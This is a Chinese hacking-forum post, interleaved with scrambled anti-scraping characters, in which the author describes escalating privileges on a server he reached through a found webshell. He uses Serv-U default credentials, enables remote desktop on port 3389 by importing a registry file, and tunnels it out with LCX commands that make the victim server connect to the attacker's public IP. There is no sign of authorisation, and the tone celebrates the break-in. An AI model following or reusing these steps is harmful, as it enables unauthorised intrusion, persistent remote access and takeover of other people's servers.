- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
|
原创作者:huar 1 U, |$ I* _' S$ w9 g
原创出处:3.A.S.T 网络安全技术团队0 b* n' P5 f# W2 t$ [' ?
) f/ Y5 f& a. J7 W$ q4 Y简单的提权教程,希望给还不会提权的兄弟们简单介绍下。
4 g+ w9 }- U6 C7 l/ o之前的一个shell,在翻看记事本的时候找到的,大致看了下,shell权限还是非常大的,于是就试试提下权。/ j) R, m8 l2 }/ n3 [/ }% h
* l9 G% ^+ s7 f% {! \1 P1 Q& I5 t
提权方法:SERU-U+LCX端口转发+注册表开3389端口
4 a! `. y$ S0 m6 l% e8 [# m/ N. O. B3 N7 R9 {
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先上传个cmd试下可以运行,在查看服务器开的端口时,发现服务器开了4899、43958等端口,是没有开3389端口的(截图提权之前未截取,抱歉``)。 于是我就试下常用的Serv-U提权了,如果管理员大叔照顾我们这些小菜的话,那就太好了..
$ j' m& ~& |4 i$ h3 o y
" o) p' v: h9 l: L
/ T# s; Q1 l6 O% b- n
* V- {2 I2 h# y' M+ h) {, Q; n先用默认账号密码试试,不过很幸运的是用默认账号密码提权成功了,嘿嘿``没想到管理员大叔这么照顾俺们这些小菜..接下来的路就好走多了~~
' U: X" j" G' Z+ _( _2 b. F% E. m( z1 W
前面说了,服务器是没有开3389端口的,工欲善其事必先利其器,由于现在我手中没有免杀的开3389端口的工具,所以我们就想想其它的办法吧``最后想了下,我们可以用导入注册表的方法开启服务器的3389服务端口,最后上传个开3389的注册表文件,在Serv-U命令下成功导入,3389端口成功开启.& k8 k2 U+ X3 G% W4 \; w
% d& p# o. v" ?( @6 f2 `# j# j( l% Y0 k" o
还有就是服务器是在内网了,那我们就要用LCX做端口转发。2 Q* [! {1 g P- p& r0 Q
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) 3389; `3 f2 l: n! u0 S0 j8 |
本地机器运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)* M/ R3 @5 t, m# x; l U
/ ]4 Q2 ?) o. a具体的可以参考下呆呆版主做的视频教程,做的非常详细,在这里就不再多说什么了。& @7 @- @" N) q' L( S
& A v0 D/ r1 J# p, @* Q5 y
+ h9 j* e9 D7 @! F( [% n d最后就是我的机器也在内网,LCX 转发端口到本地必须用公网ip,这个好办,路由器里有DMZ,可以用下这个功能的``嘿嘿~~9 x3 x, d( T) ?3 Z! y% [8 L
) k8 J1 B1 U+ V5 g9 X
) d) i7 M& h* u6 O: L& n; S) P
最后远程连接成功```
7 A- N9 k0 q' |* j- D& A d2 z) |0 |* H2 r$ _1 o
& ]2 V! k% H J
& F/ D. F G8 I前几天还在议论INTEL和AMD的服务器处理器的问题呢``这次就遇见个AMD的服务器,嘿嘿`````" p0 t0 ~# N1 [
感觉速度还可以```` |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|